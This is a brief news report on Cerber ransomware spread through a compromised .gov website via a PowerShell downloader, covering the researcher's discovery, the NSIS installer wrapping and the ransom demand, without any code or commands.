A researcher named Ankit Anubhav of NewSky Security discovered this issue last Wednesday and has tweeted it. And within hours the malware link had been removed from the website and it is unclear if tghe infection had infected anybody.
Department of Homeland Security did not any news update nor comment about the said issue.
Ransomware has been around quite a while and Cerber is one of the crypto-ransomware. It has been spread thru a number of channels like spam email campaigns, botnets, exploit kits and a lot more.
This is a pretty smart move which the attackers have done. They have targeted .gov websites since they are white-listed websites which made it by default supposedly a safe website. It would already be assumed clean so they are able to elude being detected that way.
“This PowerShell downloads malware from a known malicious site and runs it,” Anubhav said. “All these steps of course happen automatically and end user wont see it.”
Cerber is the payload and before it encrypts files on the host machine, it checks for certain language packs for Commonwealth of Independent States (CIS) countries running on the compromised computer before proceeding.
Anubhav and Villafranca wrote that the gif executable was a NSIS installer which extracts the Cerber JSON file configuration. In March, researchers found that Cerber infections were finding success in bypassing detection by hiding inside NSIS installers before executing. Researchers at Deep Instinct told Threatpost that Cerber versions 4 and 5.1 and many versions of Locky were using this technique, along with different versions of Cryptolocker and Cryptowall.
NSIS, which is short for Nullsoft Scriptable Install System, is an open source system that’s used to build Windows installers.
When all this is said and done, Cerber is still a ransomware that demands Bitcoin as payment in return, the supposed decryption key to unlock the files.